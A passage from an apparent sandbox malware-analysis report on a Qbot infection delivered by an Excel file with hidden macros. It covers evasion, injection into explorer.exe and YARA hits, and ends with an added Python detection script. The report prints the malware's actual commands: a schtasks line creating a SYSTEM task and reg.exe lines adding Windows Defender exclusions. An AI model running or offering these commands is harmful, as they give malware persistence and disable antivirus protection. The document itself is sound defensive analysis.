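Both displacements resolve to the same offset, 0x5CCD: 0xE5CCD for PID 2556 and 0x85CCD for PID 2300, inside the injected image at 0xE0000 and 0x80000 respectively. The explorer.exe code-function entries elsewhere in this report (9_2_000E5A54 beside 14_2_00085A54, 9_2_000EAEF6 beside 14_2_0008AEF6) show the same module mapped at those two bases, so the rel32 differs between the two instances only because the image landed at a different address. A hook whose decoded target falls in private, executable, unbacked memory rather than in a loaded module is the generic tell to alert on.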
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2980 Thread sleep count: 42 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2624 Thread sleep time: -92000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2272 Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2276 Thread sleep count: 38 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2276 Thread sleep time: -64000s >= -30000s
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\explorer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 8_2_6CB0D061
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0AEF6 FindFirstFileW,FindNextFileW, 8_2_6CB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000EAEF6 FindFirstFileW,FindNextFileW, 9_2_000EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0008AEF6 FindFirstFileW,FindNextFileW, 14_2_0008AEF6

Anti Debugging:

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB05F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 8_2_6CB05F63
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0DFEF LoadLibraryA,GetProcAddress, 8_2_6CB0DFEF
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC08D44 mov eax, dword ptr fs:[00000030h] 8_2_6CC08D44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC08C18 mov eax, dword ptr fs:[00000030h] 8_2_6CC08C18
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CC08923 push dword ptr fs:[00000030h] 8_2_6CC08923
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_6CC08D44 mov eax, dword ptr fs:[00000030h] 13_2_6CC08D44
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_6CC08C18 mov eax, dword ptr fs:[00000030h] 13_2_6CC08C18
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 13_2_6CC08923 push dword ptr fs:[00000030h] 13_2_6CC08923
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000E5A54 RtlAddVectoredExceptionHandler, 9_2_000E5A54
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00085A54 RtlAddVectoredExceptionHandler, 14_2_00085A54

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2556 base: 80000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2556 base: 44102D value: E9
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2300 base: B0000 value: 9C
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2300 base: 44102D value: E9
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Rebate-690835286-10052021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp Binary or memory string: Program Manager<
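The process creations listed above, together with the schtasks /Create line under Boot Survival, are the parts of this chain that are easiest to catch in process-creation telemetry: regsvr32 handed a file whose extension is not DLL-like, a scheduled task that re-runs that same command as SYSTEM, and reg.exe adding Windows Defender path exclusions. The Python below is an added example, not part of the sandbox report; it runs those three checks over a list of command-line strings constructed from the ones the report shows (the sandbox's single-quote rendering is kept as-is) plus one benign regsvr32 line added for contrast. The loadable-extension list and the switch handling are assumptions of this example.

```python
"""Process-creation rules for the regsvr32 / schtasks / reg.exe chain in this report.

Added example, not part of the original report. EVENTS is constructed from the
report's command lines; the final msxml3.dll line is a constructed benign case.
"""
import os
import re

EVENTS = [
    r"C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2",
    r"'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd "
    r"/tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32",
    r"C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' "
    r"/f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'",
    r"C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' "
    r"/f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'",
    r"C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'",
    r"C:\Windows\System32\regsvr32.exe /s C:\Windows\System32\msxml3.dll",   # constructed benign
]

_TOKEN = re.compile(r"""'([^']*)'|"([^"]*)"|(\S+)""")
LOADABLE_EXT = {".dll", ".ocx", ".ax", ".cpl"}            # what regsvr32 is normally given
_REGSVR_SWITCH = re.compile(r"^[-/](s|u|n|silent|i(:.*)?)$", re.I)
_TR = re.compile(r"/tr\s+(.+?)(?=\s+/[a-z]+\b|$)", re.I)  # /tr value up to the next switch


def tokenize(cmdline):
    """Split on whitespace, honouring '...' and "..." quoting (no escape handling)."""
    return [a or b or c for a, b, c in _TOKEN.findall(cmdline)]


def _basename(tok):
    return os.path.basename(tok.replace("\\", "/")).lower()


def check_regsvr32(tokens):
    """Flag regsvr32 loading a file whose extension is not DLL-like."""
    if not tokens or _basename(tokens[0]) != "regsvr32.exe":
        return None
    args = [t for t in tokens[1:] if not _REGSVR_SWITCH.match(t)]
    if not args:
        return None
    target = args[-1]
    ext = os.path.splitext(target.replace("\\", "/"))[1].lower()
    if ext in LOADABLE_EXT:
        return None
    return f"regsvr32 loads non-DLL extension {ext or '<none>'}: {target}"


def task_action(cmdline):
    """Recover the /tr value of a schtasks line, undoing the report's \\' quoting."""
    m = _TR.search(cmdline)
    if not m:
        return None
    action = m.group(1).replace("\\'", "'").replace('\\"', '"')
    if len(action) >= 2 and action[0] == action[-1] and action[0] in "'\"":
        action = action[1:-1]                     # strip the outer quote pair
    return action


def check_schtasks(cmdline, tokens):
    """Flag /Create tasks that run as SYSTEM or whose action trips check_regsvr32."""
    if not tokens or _basename(tokens[0]) != "schtasks.exe":
        return []
    low = [t.lower() for t in tokens]
    if "/create" not in low:
        return []
    findings = []
    if "/ru" in low and low.index("/ru") + 1 < len(tokens):
        runas = tokens[low.index("/ru") + 1]
        if runas.upper().endswith("SYSTEM"):
            findings.append(f"scheduled task runs as {runas}")
    action = task_action(cmdline)
    sub = check_regsvr32(tokenize(action)) if action else None
    if sub:
        findings.append("task action: " + sub)
    return findings


def check_reg(tokens):
    """Flag reg.exe ADD under the Windows Defender Exclusions keys."""
    if len(tokens) < 3 or _basename(tokens[0]) != "reg.exe" or tokens[1].lower() != "add":
        return None
    key = tokens[2]
    if not re.search(r"\\Windows Defender\\Exclusions\\", key, re.I):
        return None
    low = [t.lower() for t in tokens]
    has_v = "/v" in low and low.index("/v") + 1 < len(tokens)
    value = tokens[low.index("/v") + 1] if has_v else "?"   # excluded path is the value NAME
    return f"Defender exclusion added: {key.rsplit(chr(92), 1)[-1]} -> {value}"


def analyze(cmdlines=EVENTS):
    """Return (command line, finding) pairs for every rule that fires."""
    hits = []
    for line in cmdlines:
        toks = tokenize(line)
        for finding in [check_regsvr32(toks), check_reg(toks)] + check_schtasks(line, toks):
            if finding:
                hits.append((line, finding))
    return hits


if __name__ == "__main__":
    for line, finding in analyze():
        print(f"{finding}\n    <- {line}")
```

Defender stores each excluded path as a value name under Exclusions\Paths with DWORD data 0, which is why the interesting string sits in /v and not /d; a rule that only inspects /d misses these two lines. The /tr parser stops at the first " /" switch after the action, which is enough for the report's line but would truncate an action such as cmd /c ...; in production keep a raw-line match alongside the parsed one.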

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 9_2_000E31B5 CreateNamedPipeA, 9_2_000E31B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB097ED GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 8_2_6CB097ED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 8_2_6CB0D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 8_2_6CB0D061

Stealing of Sensitive Information:

Yara detected Qbot
Source: Yara match File source: 9.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Qbot
Source: Yara match File source: 9.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.regsvr32.exe.6cb00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.regsvr32.exe.4d339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.regsvr32.exe.1b339c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.906673569.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.642150052.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.719512472.00000000001A0000.00000040.00000001.sdmp, type: MEMORY